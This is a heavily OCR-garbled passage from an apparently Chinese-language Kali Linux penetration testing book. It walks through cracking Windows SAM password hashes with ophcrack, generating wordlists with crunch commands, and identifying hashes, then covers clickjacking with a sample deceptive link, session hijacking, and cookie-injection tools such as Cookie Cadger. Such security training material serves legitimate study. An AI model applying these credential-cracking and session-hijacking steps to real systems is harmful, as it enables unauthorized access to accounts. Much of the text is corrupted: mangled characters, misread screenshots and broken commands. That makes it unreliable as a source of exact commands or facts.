Preload: waiting Brute force: waiting | Pwd found: 0/0 | Time elapsed: | Oh Om Os | 
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要 访问 ophcrack， 浏 览 Password Attacks > Offline Attacks， 并 选择 命令 行 或 GUI 版 本 。 点 击 
Load ， 选 择 你 要 破解 的 文件 的 路 径 ( 例如 Windows 的 SAM 文 件 )。 


Applications Places T 国 Sun 可 【| zi, 2:06 PH 


ephcrack 


"um e [x |o UA 


i= 


Land Delete Saw ales Crack Help 


daz 


Single hash 
Pisfererze 
PA DLP file 
Session File JA Hash HT Hash LMH Fead il LMH Pwd 2 
tai TES . ciel mot found ll'H 
" disablgc* 3185cleDdt 
HelpAstistant eed zbcdd 24335:c15 


* disabled* 


在 这 个 例子 中 ， 我 们 是 在 Windows 机 需 上 使 用 Kali 的 ISO 文件 ， 并 以 取证 (Forensics ) 模式 
局 动 。 我 们 浏览 到 /windows/system32/config 目 录 以 获取 SAM 数 据 库 。 你 可 以 在 本 书 第 7 章 中 了 解 
更 多 有 关 使 用 Kali Linux 的 取证 模式 的 内 容 。 你 也 可 以 直接 将 S4M 数 据 库 的 离线 版 本 跟 Kali 一 起 
使 用 。 


Applications Places Sun Jul 21, 2:07 PM 
Select the directory containing the encrypted SAM and SYSTEM files. 


4CF45B8BF45B75E4 | WINDOWS | system32 | config Create Folder 


Places Name Modified 
4 Search E systemprofile 05/09/2013 
2 Recently Used 
Ed root 
上 Desktop 
2 File System 
Floppy Drive 
23 43 GB Filesy 


Cancel Open 


ophcrack 


FW ABE: FBO AA 4. HPDE E. mohCraekf£ Hb, Se APR ae S. 


Progress 


Slatistics 


Liser 
Supervisor... 
tata 
Administrator 
Philippe 


rz ok 
IQUE SE 


Table 


è tablet 
à table 
a lans? 
a tabled 


a ‘Vista free 


è tane] 
è tabled 
a *P 


Prelaad: 


4.6.6 Crunch 


Lhi Hash 


qddBdaB da... 
ba0efrqred... 
Jodazz... 
eaefádof37  .. 
rg3u57 tfc... 


al3anll3a... 


3eRndh33dfrd 


NT Hash 


31D6CFED... 
TEFBZÜSUF... 
33cc5388(13 
h3 TedB5H18... 
Hiz3dbrzal... 
acs 1 bb2ed... 
dbl1z2841Ha... 
da/eüB5bchb... 
TüTdBBB5zal... 


SAS fade gh 


| Directory | 
e SF free fasl Immni/aextota... 


imaia ta 


fmiriestata, .. 


“teius 
abs in Rell 
3b IN Aah 
SBS in RAM 
36% in RAM 
S63 in RAM 
Pees in RAM 
43% in RAMI 
47% In RAM 
105 in RAMI 


LM Pw 1 


GUESSME 
MAISON2 
eFeyliP 
TRa 

us 


Dang 


Brute force: 


MPwd2 | NT Pwd 


Empty 
pai 
empty 
SPER VPS 


GUues 引 e001 
maisanz 

Zizi piP wpd 
emoty tra 


gm piy 


Wwe 
of, 


Progress 


Pwd foung: Time elapsed: Oh 2m 38s 


Crunch 是 一 个 用 来 生成 密码 列表 的 工具 。 如 果 你 能 够 收集 到 有 关 目 标 如 何 创建 密码 的 情报 


的 信息 ,那么 这 个 工具 会 非常 有 用 。 举 个 例子 ， 如 果 你 抓 取 了 两 个 密码 并 观察 到 目标 都 是 用 一 个 
短语 后 跟随 机 数字 来 作为 密码 , 那么 Crunch 可 以 用 来 快速 生成 那个 短语 后 跟 所 有 可 能 的 随机 数字 


的 密码 列表 。 


eruneh version 3.4 


Crunch can create a wordlist based on criteria you specify. 


Tha autout from crm 


nch can ba sent to the screen, file, or to another progran. 


Usage: crunch «min «max» [options] 
Whare min and max are munbers 


Please refer to the man page for instmxtions and exanples on how to use crunch. 


Crunch 有 一 些 特殊 标记 字符 ， 可 以 翻译 成 如 下 。 


搬入 数字 


CO 


DD DU DO 


> 


搬入 从 号。 


淮 个 例子 ,假定 我 们 已 经 知道 目标 在 密码 中 用 pass 后 跟 两 个 不 确定 的 字符。 


e 插入 小 写字 符 ; 


D hy 


， 插入 大 写字 人 符 ; 


为 了 针对 六 位 字 


符 密 但 运行 Crunch， 我 们 会 先 让 pass 后 跟 两 位 不 确定 的 数字 。 可 用 %% 来 代表 任意 数字 。 运 行 这 
个 命令 ， 并 将 输出 放 到 一 个 名 为 ewpasswordlist.txt 的 文本 文件 中 ， 可 用 如 下 示例 输入 : 
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;-4 crunch 6 6 -t pass% >> newpasswordlist.txt 


UL now generate the following amount of data: /00 bytes 


ow generate the following number of Lines: 100 


newpasswordlist.txt 


File Edit Search Options Help 


为 了 添加 所 有 小 写字 母 到 pass 后 面 ， 我 们 可 以 用 crunch 6 6 -t pass 后 跟 @@ 来 代表 所 
有 小 写字 母 ， 如 下 面 的 截图 所 示 : 


TL crunch 6 E Il 


Crunch will now generate the 


newpasswordlist.txt 


File Edit Search Options Help 
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4.7 Kali 中 的 其 他 可 用 工具 


在 Kali 中 还 有 其 他 有 用 的 工具 。 我 们 只 介绍 其 中 能 帮忙 危害 主机 系统 、 获 取 Web 应 用 服务 送 
的 访问 权限 的 工具 。Kali 中 还 有 一 些 其 他 密码 破解 工具 没有 加 a 到 这 个 列表 中 ; 不 过 ， 对 这 些 工 具 
的 介绍 不 会 在 这 里 展开 。 


4.7.1 Hash-identifier 


Hash-identifier ( 散 列 识别 工具 ) 是 一 个 用 来 识别 散 列 类 型 的 基于 Python 的 工具 。 大 多 数 密 
但 破解 工具 如 John the Ripper 都 目 帘 了 一 个 散 列 类 型 目 动 检测 函数 , 这 类 上 旺 数 都 非常 好 用 , 在 90% 
的 情况 系 都 是 精确 的 。 而 这 个 工具 可 以 用 来 手动 验证 某 个 散 列 类 型 。 要 使 用 Hash-identifier， 可 以 
运行 这 个 工具 ， 并 粘贴 你 要 识别 的 散 列 。 


下 面 的 截图 显示 的 是 针对 某 个 散 列 的 输出 : 


File Edit View Terminal Help 


HASH: b6ddc0a05b31b438888a9886 f5da373a 


Possible Hashs: 
MD5 


Domain Credentials - MD4(MD4((Spass)).(strtolower(Susername) ) ) 


MD4 (HMAC) 
MD2 (HMAC ) 


4.7.2 dictstat 


dictstat 是 一 个 用 来 进行 密码 破解 结果 分 析 或 常规 单词 列表 分 析 的 Python 脚 本 工具 。 
dictstat 会 分 析 缮 果 ， 并 生成 用 于 屏蔽 景 力 破 解 中 已 经 破解 了 的 密码 组 合 的 掩 码 。 它 可 以 为 一 
次 破解 更 多 密码 提供 一 定 的 线索 。 当 目标 为 使 用 同一 密码 集 上 略 的 公司 时 ,这 种 方法 很 好 用 。 下 面 
的 稚 图 显示 的 是 dictstat 工 具 的 主 界面 : 
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要 运行 qictstat， 输 入 qictstat [选项 ] passwords.txt. 下 面 的 截图 显示 的 是 使 用 
dictstat 的 例子 : 


4.7.3 RainbowCrack (rcracki mt) 


Rainbowcrack 是 一 个 散 列 破解 程序 ， 它 会 生成 用 于 密 但 破解 的 彩虹 表 。RainbowCrack 跟 
标准 的 骏 力 破解 方法 有 所 不 同 ， 它 使 用 大 量 的 预计 算 好 的 表 来 减少 破解 密码 需要 的 时 间 。 
RainbowCrack 工 具 已 经 有 点 年 代 了 ,不 过 ,现在 依然 可 以 有 大 量 免 费 的 彩虹 表 可 供 下 载 ， 比 如 
www .freerainbowtables .com。 下 面 的 鹤 图 显示 的 是 RainbowCrack 的 主 界 面 : 
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4.7.4 findmyhash 


findmyhash 是 一 个 用 免费 的 在 线 服务 来 破解 密码 的 Python 肢 本 工具 。 在 使 用 此 工具 时 ， 你 
必须 先 连 到 因特网 。 下 面 的 截图 显示 的 是 fingmyhash 在 向 多 个 网 站 进行 MD5 散 列 的 查询 。 


4.1.5 phrasendrescher 

phras endrescher 是 一 个 模块 化 的 多 线程 密码 短语 破解 工具 。 phrasendrescher 日 AI 
很 多 插件 ， 同 时 还 提供 给 了 支持 新 插件 开发 的 API。 
4.7.6 CmosPwd 

cmosPwd 用 来 破解 基本 输入 输出 系统 ( BIOS, Basic Input/Output System ) 的 密码 。Cmospwd 
允许 你 擦 除 /清理 、 备 份 和 恢复 CMOS。 
4./.f creddump 


creddqump 是 一 个 Python 工具 , 用 来 从 Windows 的 注册 表 中 提取 各 种 凭据 和 密码 。creddump 
可 以 提取 LM 和 NT 散 列 ( sYsKEY 保 护 的 )、 缕 存 的 域 密 码 和 LSA 密 人 码 。 
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4.8 ”小结 

主机 系统 是 访问 Web 应 用 的 授权 来 源 。 侵入 已 授权 的 主机 可 以 让 渗透 测试 人 员 拿 到 访问 目标 
Web 应 用 的 授权 凭据 。 这 点 有 时 会 在 对 Web 应 用 进行 渗透 测试 时 被 忽视 。 

本 章 介绍 了 用 来 获得 主机 系统 非 授权 访问 权限 的 各 种 方法 ， 着 重 介绍 了 使 用 社会 工程 方法 、 
找 出 带 有 未 修复 漏洞 的 主机 以 及 破解 密码 。 市 面 上 关于 侵入 主机 系统 的 书 已 经 不 少 了 。 读者 可 以 
将 本 章 内 容 跟 本 书 其 他 章 的 内 容 一 起 使 用 , 这 样 更 有 效 。 我 们 将 本 章 的 内 容 限 制 在 攻击 能 够 访问 
Web 应 用 的 目标 主机 。 


下 一 章 将 会 介绍 如 何 攻击 主机 跟 Web 应 用 之 间 进 行 身 份 认 证 的 方式 。 


身份 认证 攻击 


号 份 认证 是 确认 信任 某 人 的 吴 份 。 它 的 含义 可 能 会 包含 确认 某 个 人 、 某 个 应 用 或 是 菏 个 硬件 
的 号 份 ， 比 如 验证 .Josepjp Wanpzz 是 政府 雇员 ， 以 及 他 的 笔记 本 电脑 是 由 政府 机 构 颁 发 的 。 作 为 渗 
透 测试 人 员 ， 通 过 已 授权 的 实体 获得 系统 的 信任 、 绕 过 安全 认证 部 分 非常 有 用 。 


注册 信息 系统 安全 师 CCISSP, Certified Information Systems Security Professional ) 课程 中 将 
身份 认证 按 三 个 因子 归 类 如 下 : 


O 你 知道 的 ， 比 如 PIN 或 密码 ; 
OQ 你 拥有 的 ， 比 如 智能 卡 ; 
口 你 是 谁 ， 比 如 指纹 。 


最 常用 的 确认 身份 的 方法 是 通过 人 们 知道 的 内 容 ， 比 如 密码 。 第 4 章 介 绍 了 攻击 主机 系统 时 
各 种 破解 密码 的 方法 。 你 能 够 通过 破解 密码 获得 一 些 系 统 的 访问 权限 , 不 过 许多 系统 都 使 用 了 多 
个 因子 的 映 份 认证 ， 也 就 是 说 证 明 某 人 身份 时 需要 多 个 认证 步 又 。 


第 见 的 用 户 号 份 认 证 方式 中 包括 组 合 使 用 用 户 名 和 密码 。 如果 茶 个 用 户 每 次 要 进行 映 份 认证 
时 都 要 输入 这 部 分 信息 ， 那 会 非常 且 烦 。 为 了 解决 这 个 问题 ， 人 们 发 明了 单 点 登录 (Single 
Sign-on )， 即 由 某 个 集中 式 授 权 机 构 对 菏 人 进行 号 份 认证 ， 而 其 他 站 点 都 会 信任 这 个 身份 。 集 中 
式 授权 机 构 会 代表 用 户 或 设备 验证 信任 , 所 以 用 户 可 以 访问 多 个 安全 的 系统 ， 而 不 必 在 每 个 安全 
入 口 午 输入 一 次 密码 。Windows 的 域 控 制 囊 就 是 一 个 间 见 的 受信 任 的 授权 机 构 ， 它 为 内 部 用 户 访 
问 内 网 资源 提供 着 身份 认证 功能 。 在 这 些 例子 中 ,以 较 高 权限 侵入 受信 任 的 授权 机 构 或 账户 可 能 
意味 着 具备 了 访问 许多 其 他 这 类 系统 上 的 内 部 资源 的 权限 。 


许多 政府 机 构 都 会 将 个 人 身份 验证 ( PIV, Personal Identity Verification ) 或 通用 访问 卡 ( CAC， 
Command Access Card ) “和 密码 一 起 搭配 使 用 ， 这 样 就 满足 了 用 户 拥有 和 用 户 知道 的 双重 条 件 。 


(D PIV 是 美国 联邦 政府 在 FIPS 201 标 准 中 对 联邦 政府 雇员 和 承包 商 要 求 的 智能 卡 。CAC 是 美国 国防 部 用 来 进行 多 重 身 
份 验证 的 智能 卡 。 通 用 访问 卡 作为 标准 认证 发 行 ， 可 以 认证 现役 军人 人、 后备军 人 、 文 职 雇员 、 非 国防 部 雇员 、 
民警 卫队 的 工薪 阶层 和 合格 的 承包 商人 员 。 加 上 它 作 为 身份 证 的 功能 ， 访 问 政府 建筑 和 计算 机 网 络 时 需要 出 示 通 
用 访问 卡 。 一 一 译 者 注 
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远程 工作 人 员 通 常会 用 数字 令 牌 (Digital Token )， 它 会 过 几 秒 钟 就 生成 一 个 新 的 数字 ， 并 跟 PIN 
一 起 使 用 , 代表 他 们 拥有 和 他 们 知道 的 双重 条 件 。 高 安全 要 求 的 物理 位 置 可 能 会 要 求 指纹 扫描 外 
加 PIN 来 访问 。 网 络 访问 控制 技术 可 以 验证 用 户 对 笔记 本 有 何 权 限 ， 并 在 提供 网 络 资源 前 移 找 出 
隐藏 的 证 书 来 验证 系统 和 用 户 的 号 份 。 对 于 渗透 测试 人 员 来 说 , 关键 是 在 侦察 阶段 找 出 目标 使 用 
的 号 份 认证 方法 ， 这 样 你 才能 规划 出 绕 过 信任 的 合适 策略 。 


3] 


本 章 重 点 介绍 用 户 和 设备 如 何 通过 Web 应 用 进行 身份 认证 ， 目 标 是 可 以 利用 目标 的 信任 。 首 
先 ， 我 们 介绍 攻击 管理 身份 认证 会 话 的 过 程 ， 也 就 是 客户 端 和 服务 器 建立 信任 的 过 程 。 之 后 , 我 
们 会 重点 关注 客户 端 ， 攻 击 点 是 主机 系统 是 如 何 通 过 cookie 管 理 来 存储 数据 。 接 着 ， 我 们 会 独 重 
关注 使 用 中 间 人 攻击 达到 隐藏 在 客户 端 和 服务 器 之 间 的 目的 。 最 后 一 部 分 内 容 是 通过 SQL 和 跨 站 
脚本 攻击 (XSS，Cross-Site Scripting ) 找 出 和 利用 Web 应 用 接受 里 份 认证 过 程 中 的 薄弱 环 广 。 


5.1 KERAHE 


屿 份 认 证 和 会 话 管理 涵盖 了 处 理 用 户 喘 份 认证 和 管理 活动 会 话 的 方方面面 。 对 Web 应 用 来 
说 , 会 话 就 是 用 户 在 东 个 网 站 上 花费 的 时 间 。 最 佳 实践 是 基于 用 户 和 设备 是 如 何 通 过 号 份 认证 的 
来 管理 已 通过 吴 份 认证 的 会 话 〈 也 就 是 ， 人 允许 你 访问 哪些 资源 )， 同 时 要 控制 活动 会 话 期 间 哪 些 
资源 可 用 、 能 用 多 和 久 。 这 使 得 号 份 认 证 成 为 管理 授权 会 话 的 关键 过 程 。 
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渗透 测试 人 员 的 目标 是 找 出 具有 高 权限 的 允许 访问 特定 资源 的 账户 , 并 且 访 问 Web 应 用 的 时 
间 不 受 限制 。 这 也 是 为 什么 要 创建 会 话 管 理 的 安全 功能 ， 如 会 话 超时 时 间 和 SSL 证 书 ， 的 主要 原 
因 。 不 管 怎么 说 ，Kali 中 带 有 的 工具 可 以 找 出 会 话 管理 中 的 漏洞 ， 比 如 截获 Web 应 用 中 发 送 用 户 
退出 登录 请 求 的 活动 会 话 ， 然 后 将 那个 会 话 给 另外 一 个 人 用 。 这 种 攻击 也 称 为 会 话 固定 攻击 


( session fixation attack )。 


会 话 管理 攻击 可 能 会 出 现在 利用 了 应 用 中 的 漏洞 或 是 用 户 AEL FEITA di 
TENE PIA. MEAE AY A IN EX Web HR 45-28 34 T P5 vi ANTE ESQLIE ALL 
i. AEST. MEA AN BES HD aH fcmina 或 是 网 页 中 的 漏洞 来 达到 
类 似 的 结果 。 让 我 们 先 看 个 通过 修改 超 链接 和 下 rame 来 欺骗 用 户 泄漏 敏感 信息 或 是 将 用 户 上 自己 又 
露 在 攻击 下 的 技术 。 


点 击 劫持 


点 击 劫持 (clickjacking ) 是 欺骗 用 户 点 击 其 他 东西 而 不 是 他 们 认为 正在 点 击 的 东西 的 一 种 技 
术 。 点 击 劫持 可 用 来 显示 机 密 信息 ， 比 如 登录 和 凭据， 也 可 以 用 来 帮助 黑客 控制 受害 者 电脑 。 点 击 
noun HU PE 
击 支持 的 一 个 例子 是 将 超 链 接 文本 指 癌 一 个 受信 站 点 ( 如 正中 的 可 信 站 点 ) 而 非 真 实 的 站 点 。 
通用 户 并 不 会 在 点 击 前 验证 超 链接 , 或 是 注意 到 跟 常见 的 点 击 支持 意图 相关 的 变更 , 这 使 得 点 di 
劫持 成 为 非常 有 效 的 攻击 形式 。 


在 下 面 的 例子 中 ， 用 户 会 看 到 Visit us on Facebook.com ( 访问 我 们 的 Facebook 主 页 ) 链接 , 
但 当 他 们 点 击 该 链接 时 ， 实 际 上 会 被 重 定 向 到 www.badfacebook.com。 


<a href = "访问 我 们 的 Faceljbook 主 页 (http: //Aww.badfacebook.com) "> Visit Us on Facebook.com </a> 


点 击 劫持 的 危害 性 可 能 会 更 大 更 复杂 , 而 不 只 是 修改 超 链 接 这 么 简单 。 一 般 使 用 点 击 劫持 的 
攻击 者 会 在 网 页 中 舱 入 iFrame。iFrame 的 内 容 会 包含 从 目标 网 站 上 获取 的 数据 ， 并 且 通 常会 放 到 
合法 的 链接 上 面 ， 使 得 它 很 难 被 发 现 。 


要 制作 你 自己 的 点 击 劫持 攻击 ， 你 可 以 用 Paul Stone 开 发 的 点 击 劫持 工具 ， 你 可 以 从 
http://www.contextis.com/research/tools/clickjacking-tool/ 下 载 。 


ee HOME | SERVICES | ABOUT US NEWS OASIS | CONTACT US 


INFORMAT TER SECURITY 
- Minos 


r SL) ar ce 


RESEARCH SERVICES 
RECENT BLOG POSTS 


CLICKJACKING TOOL 
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下 载 好 该 工具 后 ， 你 可 以 用 它 来 从 另外 一 个 网 站 上 获取 代码 ， 比 如 投票 按钮 或 喜欢 按钮 。 这 
个 点 击 劫持 工具 可 以 跟 Firefox 3.644 Be ~ Paul Stone 的 工具 没 法 跟 更 新 版 本 的 Firefox 一 起 使 用 ， 
不 过 ,你 可 以 在 Kali 工 具 集 中 运行 多 个 版 本 的 Firefox， 包 括 Firefox 3.6 或 更 早 的 版 本 。 


网 站 代码 会 经 常 改变 , 所 以 确保 调整 了 你 的 攻击 代码 , 使 其 跟 镜像 的 受信 站 
点 能 够 一 起 工作 。 
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cookie 是 从 网 站 发 出 来 的 小 块 信息 块 ， 在 用 户 访 问 网 站 时 存储 到 用 户 的 Web 浏 览 各 中 。 网 站 
可 以 用 cookie 来 验证 该 用 户 是 不 是 再 次 访问 该 站 点 ， 并 且 可 以 取 回 用 户 之 前 活动 的 详细 信息 。 这 
些 信息 包括 网 页 是 如 何 被 访问 的 、 用 户 是 如 何 登录 的 ， 以 及 用 户 上 点击 了 哪些 按钮 。 不 管 你 什么 时 
候 登 录 网 站 ， 比 如 Facebook、Gmail 或 是 Wordpress， 浏 览 磊 都 会 给 你 分 配 一 个 cookie。 


cookie 可 以 包含 用 户 长 期 的 跟踪 历史 ， 甚 至 可 以 记录 在 某 个 网 站 上 多 年 前 的 行为 。cookie 也 
可 以 用 来 存储 用 户 之 前 输入 的 密码 和 表单 值 ， 比 如 他 们 的 家 姓 住 址 或 信用 卡号 。 这 对 于 期 望 为 用 
户 提供 尽 可 能 简单 的 用 户 体验 的 商业 网 站 一 一 如 零售 一 一 来 说 非常 有 用 ,只 要 客户 端 主 机 进行 刁 
份 验 证 , 会 话 令 牌 就 会 从 服务 帮 上 分 发 到 主机 上 。 会 话 令 牌 可 以 用 作 识 别 不 同 链接 的 途径 。 会话 
动 持 发 生 在 攻击 者 截获 了 会 话 令 牌 , 并 将 它 注入 到 他 们 目 己 的 浏览 妖 中 以 获得 受害 者 的 已 通过 母 
份 认 证 的 会 话 。 总 的 说 来 ， 它 是 将 攻击 者 的 未 通过 验证 的 cookie 蔡 换 为 受害 者 的 已 通过 验证 的 
cookie 的 过 程 。 


会 话 动 持 攻 击 也 有 一 些 限制 。 


O 如 朱 目 标 是 通过 https:/ 来 浏览 ， 并 且 居 用 了 奖 到 端 加 密 ,， 那 么 贸 取 cookie 是 没 用 的 。 虽 然 
https 的 推广 进程 缓慢 ， 不 过 大 多 数 的 安全 网 站 都 提供 了 这 种 防御 来 对 付 会 话 劫持 攻击 。 


GS 你 可 以 将 SSLstrip 用 作 发 动 会 话 动 持 或 其 他 攻击 前 防止 你 的 目标 完成 https 链 
从 > 接 的 一 种 方法 。 有 关 SSLstrip 的 更 多 信息 ， 可 以 参考 第 3 章 的 内 容 。 


a 当 目 标 登 出 茶 个 会 话 时 ， 许 多 cookie 痢 会 失效 。 这 也 会 激昂 攻击 者 的 会 话 登 出 。 对 有 些 用 
到 不 会 过 期 的 cookie 的 移动 应 用 来 说 ,这 是 个 问题 。 它 意味 着 只 要 攻击 者 帘 狂 了 一 个 有 效 
的 会 话 令 牌 ， 他 就 永远 有 访问 权限 。 


许多 网 站 不 文 持 并 发 登录 ， 这 使 得 狠 来 的 cookie 很 难 使 用 。 
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53 Web 会 话 工具 


下 一 节 我 们 会 介绍 用 来 对 Web 会 话 进行 渗透 测试 的 工具 。 有 些 工具 在 Kali 1.0 中 还 没有 , 但 你 
可 以 在 线 获 取 。 


5.3.1 Firefox 


人 工 进 行 会 话 支持 的 方法 是 和 琅 取 受害 者 的 已 通过 喘 份 认证 的 cookie。 其 中 一 种 方式 是 回 已 被 
侵入 的 Web 应 用 服务 希 注 入 一 个 脚本 ， 这 样 可 以 在 用 户 训 不 知情 的 情况 下 截获 cookie。 从 这 里 开 
台 ， 攻 击 者 就 能 够 拿 到 已 认证 cookie, 并 用 cookie 注 入 工具 来 用 急 取 的 已 认证 cookie 来 替换 攻击 者 
的 cookie。 其 他 用 于 守 取 cookie 的 方法 还 包括 数据 包 别 探 ( Packet Sniffing ). 网 络 数据 和 攻击 主机 。 
在 本 书后 面 的 章节 中 ， 我 们 会 介绍 和 和 取 cookie 相 关 的 内 容 。 


Firefox 浏 览 硕 提供 了 许多 可 以 用 来 将 入 取 的 cookie 注 入 到 攻击 者 浏 览 硕 的 插件 。 其 中 一 些 例 
子 包括 GreaseMonkey Cookies Manager 和 Firesheep。 我 们 建议 读者 通过 浏览 Firefox 的 插件 商店 来 
找寻 满足 渗透 测试 需要 的 各 种 cookie 管 理工 具 。 


| GS Kali Linux 1.0 中 并 未 默认 安装 Firefox 和 所 有 相关 插件 。 | 


5.3.2 Firesheep (Firefox 插 件 》 


Firesheep 是 一 个 典型 的 用 于 对 Web 会 话 进行 审计 的 渗透 测试 工具 。Firesheep 是 Firefox 的 一 个 
扩展 ， 不 过 ， 有 些 版 本 跟 Firefox 的 最 近 几 个 版 本 不 太 兼 容 。 Firesheep 充 当 着 数据 包 在 网 络 上 传送 
时 拦截 网 站 未 加 密 的 cookie 的 数据 包 虽 探 融 的 角色 。 


Firefox Firesheep 播 件 官方 支持 的 是 Windowgs 版 本 和 Mac 版 本 ,这 使 其 在 Linux 
FX 上 操作 起 来 略 显 笨拙 。 通 过 一 些 定制 动作 ， 我 们 可 以 让 Firesheep 在 Linux 环 境 中 
的 可 操作 性 更 强 。 不 过 ， 我 们 建议 大 家 使 用 更 主流 的 工具 。 


5.3.3 Web Developer (Firefox 插 件 ) 


Web Developer 是 一 蒜 为 Web 开 发 者 提供 了 编辑 和 调试 功能 的 Firefox 扩 展 。Web Developer 可 
以 从 Firefox 的 插件 市 场 人 免费 下 载 。Web Developer 中 对 会 话 支持 很 有 用 的 功能 是 编辑 cookie。 安 法 
好 Web Developer 之 后 ， 你 可 以 从 Firefox 浏 览 硕 的 一 个 下 拉 选 单 中 看 到 。 如 下 面 的 截图 所 示 : 
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ti Most Visited J| Offensive Security 


Kali Linux 


dis =. ' "gu m 
© Disable | A Cookies v | * CSS P Forms [=] [m 


Disable Cookies 


9 : Add Cookie... 


Delete Domain Cookies 
Delete Path Cookies 


Delete Session Cookies 


View Cookie Information 


选择 View Cookie Information ， 你 能 看 到 已 经 保存 的 cookie。 你 可 以 点 击 Edit Cookie 来 调 起 
cookien tr, MDX EA cookii cookie. 


Edit Cookie 


Name | utma 
Value 159988847.42247980.13683241 
.chrispederick.com 
JA 
Expires EA Tue, 12 May 2015 02:02:26 GM 
[|] Session cookie 


[| Secure cookie 


5.3.4. GreaseMonkey (Firefox 插 件 ) 


148 第 5 章 ”身份 认证 攻击 
GreaseMonkey 是 一 球 Firefox 插 件 , 它 允 许 用 户 安装 脚本 在 页 面 加 载 前 和 加 载 后 直接 修改 Web 


页 面 的 内 容 。GreaseMonkey 可 以 用 来 定制 Web 页 面 的 外 观 、Web 功 能 、 调 试 ， 合 并 其 他 页 面 的 数 
据 ， 以 及 其 他 用 途 。 其 他 有 些 工 具 也 会 依赖 GreaseMonkey 来 正常 工作 ， 比 如 Cookie Injector. 


5.3.5 Cookie Injector 〈Firefox 插 件 ) 


Cookie Injector 是 一 个 用 户 脚 本 , AF fa te V dt cookie wt Fe. Tf Wireshark—28 TAP 
JIUBULI] cookie A BUM a. Pte ERS A TGR, Cookie Injector 人 允许 用 户 从 转 存 中 直接 复制 粘贴 
cookie 部 分 ， 这 样 就 能 在 当前 浏览 的 Web 页 面 中 自动 生成 转 存 中 的 cookie。 


| GS 你 必须 在 使 用 Cookie Injector 脚 本 之 前 先 安装 GreaseMonkey。 


BE Cookie Injector， 你 可 以 在 谷歌 中 搜索 Cookie seiten rela 在 你 
选择 下 载 Cookie Injector 时 ，GreaseMonkey 会 弹出 来 ， 提 示 你 已 经 确认 安装 


‘Cookie Injector’ installed successfully. je 


Ok 


安装 好 Cookie Injector 脚 本 后 ， 按 下 Alt+C 来 显示 cookie 对 话 框 。 将 复制 好 的 Wireshark 字 人 符 串 
粘贴 到 输入 框 中 ， 点 击 OK 来 将 cookie 注 入 到 当前 页 面 。 你 可 以 参考 $.3.8 节 的 内 容 了 解 如 何在 
Wireshark 中 通过 Copy、Bytes 并 选择 Printable Text Only 来 为 Cookie Injector 复 制 cookie。 下 面 两 个 
截图 显示 的 是 按 下 Alt+C 粘贴 Wireshark Cookie Dump} ATOK, 然后 弹出 框 说 明和 截获 的 cookie 
已 被 成 功 写 和 人 Web 浏览 器 的 情形 。 


Wireshark Cookie Dump: 


F0289 Connection: keep- awe | 


OK Cancel 
= 


All Cookies Have Been Written 
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5.3.6 Cookies Manager+ (Firefox 插 件 ) 


Cookies Manager+ 是 一 个 用 于 查看 、 编 辑 和 创建 cookie 的 工具 。Cookies Manager+ 会 显示 有 关 
cookie 的 详细 信息 ， 并 支持 批量 编辑 cookie。Cookies Manager+ 也 可 以 用 于 备份 和 还 原 cookie。 你 


AJ s’ 


tH Ay VAM Firefox tii rie F Cookies Manager+. 
安装 好 之 后 ， 你 可 以 在 Tools 中 选择 Cookies Manager+ 来 访问 该 工具 。 


File Edit View History Bookmarks 


eT ELER T D... = Downloads 
Add-ons Ctrl-Shift-A 一 


| @ Mozilla Corporation (US) https:/ 
Set Up Sync... 
ii Most Visited || Offensive Securit 
H A Greasemonkey 
” Disable Cookies + CSS 


Web Developer 
Web Developer Extension 
Page Info Ctrl+I 


"1 
ADD-ONS Cookies Manager+ 


EXTENSIONS THEMES COLLECTIONS MORE... 


Cookies Manager ib zs Firefox 83 HATA cookie, (RAY EA jr m] RR Im Ae RSS REAE cookie 
来 查看 和 /或 编辑 。 在 下 面 的 例子 中 ， 我 在 查找 所 有 跟 www.thesecuritybloggercom 关 联 的 cookie。 


Cookies Manager+ v1.5.1.1 [showing 7 of 231, 
File Edit View Tools Help 
Search: thesecurityblogger| 


L] | Site ~ Name 
|| thesecurityblogger.com --utmz 


—r——————M— 
wp-settings-1 

editor 43 Dtinymce4 26m0%4%3 Dc426m1143 Dox 26n 
www. thesecurityBlogger.com 


i 


Any type of connection 


Sat 10 May 2014 09:01:40 PM EDT Will expire i 


Cookies Manager+ 使 得 编辑 已 有 cookie 非 党 容易 。 这 有 助 于 进行 各 种 类 型 的 攻击 ， 比 如 会 话 
劫持 和 SQL 注入 。 
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Edit Cooklie+ 


Name: | wp-settings-1 | 
Content: | editor43 Dtinymce?6 26mO363 Dco6 26m11263D 026 26m67263 Do% 26imgsize | 
Host: | www. thesecurityblogger.com | 
Path: |/ | 


P 
à 


Send For: | Any type of connection 


Http Only 


ELA HE = 


5.3.7 Cookie Cadger 


COOKIE CADGER 


Cookie Cadger 是 一 个 用 于 对 Web 会 话 进行 审计 的 渗透 测试 工具 。Cookie Cadger L SEEXAXTEZH 
的 HTTP 请 求 并 回放 非 安 全 的 HTTP GET 请 求 , 比如 请 求 的 资源 、 用 户 代 理 、 网 站 来 路 和 基本 认证 。 
Cookie Cadger 可 以 提供 针对 Wi-Fi 和 有 线 网 络 的 实时 分 析 ， 以 及 加 载 数 据 包 捕捉 文件 (PCAP ) 的 
功能 。Cookie Cadger 还 提供 了 会 话 检 测 功 能 来 判断 用 户 是 否 已 经 登录 了 站 点 ， 如 Wordpress 和 
Facebook。 有 些 人 也 会 将 Cookie Cadger 当 做 Firesheep 的 和 蔡 代 品 。 


| Kali 1.0 中 没有 带 Cookie Cadger。 


Cookie Cadger 可 以 从 www.cookiecadger.com 下 载 。 下 载 文件 是 个 JAR 文 件 。 双 击 文件 打开 
Cookie Cadger。 它 会 弹出 个 警告 来 询问 你 是 否 要 启用 会 话 检 测 功 能 。 点 击 Yes， 就 会 弹出 主 界面 。 
下 面 两 个 截图 显示 的 是 Cookie Cadger 1.0 JAR 文 件 弹出 的 警告 消息 窗口 和 主 界面 。 
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Enable Session Detection? 


Session detection replays web requests in the background and analyzes 
them for evidence that a user is logged in. Enabling session detection 
will cause Cookie Cadger to utilize a larger amount of available 

system resources. 


By enabling this feature you also understand that: 


1) Cookie Cadger will (potentially) automatically impersonate any 
network user without their explicit permission or interaction on your part. 


2) The legality of doing so varies between jurisdictions. It is your 
responsibility to understand and comply with any applicable laws. 


Would you like to enable session detection? 


| Yes || No | 


Cookie Cadger 
File Edit Help 


etho [no description] | Start Capture on etho 


Requests | Recognized Sessions 


Filter MACs Filter Domains Filter Requests 


Load Domain Cookies Replay Request Modify & Replay Request 


J any (re SCUWU*TUCVICC UTOU COp/tUur x5 UTI Omm nricerracesy 


4. lo 
Capture device search completed with 4 devices found. 


Cookie Cadger (v1.00, https://cookiecadger.com) 
